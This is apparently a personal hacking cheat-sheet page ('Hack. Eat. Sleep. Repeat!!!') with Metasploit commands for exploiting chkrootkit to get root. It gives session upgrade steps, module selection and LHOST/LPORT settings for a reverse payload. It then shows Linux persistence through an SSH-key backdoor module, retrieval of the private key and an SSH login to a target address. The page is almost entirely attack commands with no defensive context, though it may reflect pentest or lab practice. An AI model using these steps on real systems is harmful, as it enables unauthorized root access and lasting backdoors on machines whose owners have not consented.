root💀bl4ck4non-sec:~#

Hack. Eat. Sleep. Repeat!!!

View on GitHub

Exploiting chrootkit

To check the process key

ps aux

To escalate privilges using chrooktit, ensure you upgrade to a meterpreter session

sessions -u 1

Now looking for the module

search chrootkit
use exploit/unix/local/chkrootkit

Exploiting

set SESSION 2 (to meterpreter session)
set chkrootkit /bin/chkrootkit  (Check the path to this on the target's machine)
set LHOST
set LPORT
run

Linux Persistence

After getting root on the target’s machine, to get persistence

use post/linux/manage/sshkey_persistence
set SESSION 4 (to the root meterpreter session)
set CREATESSHFOLDER true
exploit

To view the newly created private key that can be used to authenticate with target system

loot

Giving permission to the private key

chmod 0400 id_rsa

To authenticate as the user

ssh user@10.10.10.10 -i id_rsa

Another way to do this is to copy the id_rsa key after getting root shell instead of using the metasploit module